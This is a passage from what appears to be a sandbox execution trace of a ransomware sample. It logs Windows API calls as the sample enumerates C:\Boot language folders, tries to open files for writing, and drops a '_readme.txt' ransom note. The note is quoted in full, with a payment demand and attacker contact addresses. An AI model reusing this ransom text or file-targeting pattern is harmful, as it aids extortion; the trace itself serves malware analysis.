(HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.024] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0228.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0228.024] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0228.024] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0228.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0228.024] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0228.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0228.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.025] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0228.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.025] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.025] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0228.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.025] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned=".mui" [0228.025] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0228.026] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.026] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0228.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0228.026] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0228.026] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.027] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0228.027] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.028] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.028] PathFindFileNameW (pszPath="") returned="" [0228.028] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0228.028] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0228.028] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.028] FreeLibrary (hLibModule=0x75000000) returned 1 [0228.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.029] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0228.029] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0228.029] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0228.029] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0228.029] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0228.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0228.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.030] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0228.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.030] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.030] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.030] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned=".mui" [0228.030] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7418 | out: hHeap=0x630000) returned 1 [0228.030] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.030] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0228.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0228.030] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0228.030] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0228.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 